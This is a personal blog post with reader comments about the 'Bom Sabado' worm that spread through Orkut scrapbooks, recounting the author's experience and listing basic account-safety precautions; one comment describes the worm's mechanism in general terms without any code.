The Internet has added several verbs to the English language. If you don't belive me, just 'google' it out. 'Googling', 'Orkutting' are from this new clan of verbs. For those who don't know what Orkut is, let me tell them that it is a social networking site by owned by Google Inc. and for those who were hibernating deeper, social networking is a form of net-friendship for people. I have been on Orkut (maintaining an Orkut account) for the past 3 years or so and have experienced all the good and bad effects of being on it. Among the good parts is the fact that Orkut lets me remain connected with so many friends, family members and acquaintances -- not all I am connected to but the ones who see their accounts regularly and care to respond, send a broadcast by way of status messages and share a few pictures with them. There are other uses of Orkut too, but I use it just for these three.
A couple of days back, I received a couple of scraps (small messages, mostly visible to all my friends and me) on my scrapbook. The messages read 'Bom Sabado'. I could not make the head or tail of it because this was definitely not Hindi, English or German. It didn't sound like Chinese, Japanese, Korean, Arabic or Persian either. Looked like European to me. I 'googled' it out and found out that 'Bom Sabado' means Good Saturday in Portuguese.
I also came to know that this scrap was the result of a new worm (a kind of virus) attack that infested some Orkut accounts and sent 'Bom Sabado' as a message to all the persons enlisted as friends in the affected account. The worm originated from Brazil. Incidentally, Indians and Brazilians form the biggest demographical groups on Orkut. The worm utilized a small vulnerability in the browsers from compromised accounts on orkut to get the encrypted password from the cookie file and use it for itself.
Mostly the systems infected were the ones that were online when this worm spread and attacked. People who answered to this scrap also had some vague Brazilian communities added to their accounts and ended up getting infected and sending the scraps. There were also reports of accounts being rendered inaccessible, the 'Bom Sabado' scraps not being deleted and scrapbook not opening. I was fortunate that although I received two such scraps, my account was not infected because I took some timely measures.
By now, Google has taken care of the worm and stopped the spread of this worm. It is also trying to restore the infected systems. However, it was strongly recommended by Google that the users clean up their browser cache of any saved passwords, cookies and temp files, along with a change of their account access password and the security question.
Wait a second! Google asked me to change my password and my security question too??? Now, Orkut account is always connected to an account on google, which most people open with the opening of an email account. Later they start writing a blog, sharing pictures through picasa, buzzing away, using a calendar for their schedules, and several other google onlline services, again using the same account details, i.e., the username and the password!
So, I had to effectively change the password for all the google services, though just once and at a single place. But, doesn't this mean that if my account details and password could be obtained from Orkut, or through some vulnerability in the browsers, all my google accounts are vulnerable to such attacks and could be compromised.
This 'Bom Sabado' episode taught me a few lessons that I would like to share with all of you.
1. Don't keep yourself logged into Orkut (or any site, for that matter) when you don't need it and when you are not using it.
2. If possible, maintain a separate account (separate from your regular email account) for Orkut. This could mean creating a new account and adding up friends again and deleting your old account. Else, create a new email account for yourself. It would be a pain, but still do it, if you want to be safe.
This could be tough, but you need to do this because it also means that if something like the 'Bom Sabado' attack is possible, everything connected to your Google identity could be compromised, and is at stake, so be sure to isolate things before something like this 'Bom Sabado', or a better version of such an attack threatens your main email account (if in Gmail) and all connected Google accounts like Picasa, Reader, Buzz, Calendar, Voice, Sketchup etc etc.
2. Set up your Orkut account to send an email to you whenever someone scraps you. You would get the content of scrap on your email without even logging into your orkut account. When you see something strange like 'Bom Sabado' in some strange language, think if the friend who scrapped to you would know this language, or if it probably makes sense to both of you. If not, and if you see multiple emails informing you of the same scrap content, google it out immediately (I did this when I saw two scraps with this 'Bom Sabado') and get to know what is going on. Mostly you would get to know about such attacks along with an advice on what to do, on the Net itself.
3. Don't log into Orkut if something like this happens. Be sure to clean your browser cache of all history, auto-complete, saved passwords, cookies and temp-files. Change your password and security question too.
4. Still don't login. Stay off Orkut until things are taken care off by Google. When you read on the Net that it is over, log back in.
Let's hope such basic precautions would suffice, at least for a while and google would be more robust and less prone to such attacks in future! Amen!!
Wow Amitabh Bhaiya, great Post. Thanks for Sharing.
ReplyDeleteIn this Digital age, I believe "Prevention is better than cure" is the most apt proverb.
Sir I have some more information...
ReplyDeleteNew version of Orkut is found to be affected by a MASS SPREADING WORM. The worms analysis says that it’s just a mass spreading worm which uses your scrap book to spread and makes you join few communities. The worm writer bypassed the script restrictions on orkut.
Java script code which is hosted in tptools.com is called via onload function and executed, and this happen when you login and reach your orkut home page as your new scraps are updated in your home page, or either by visiting your scrap book triggers the execution of the code.
The worm is programmed to send copy of itself to all in your friend list via scrap and make you join few communities.
And there would not be much harm as of now, and I don’t think you need to change your password and all.
Still I am not aware of actual payload of Worm.
As soon as payload would be done and would be updated.
(Note: Analysis is done by fb1h2s.)
Thanks Abhinna and Subrat. Thanks for adding, Subrat. That's a security expert talking, I know.
ReplyDelete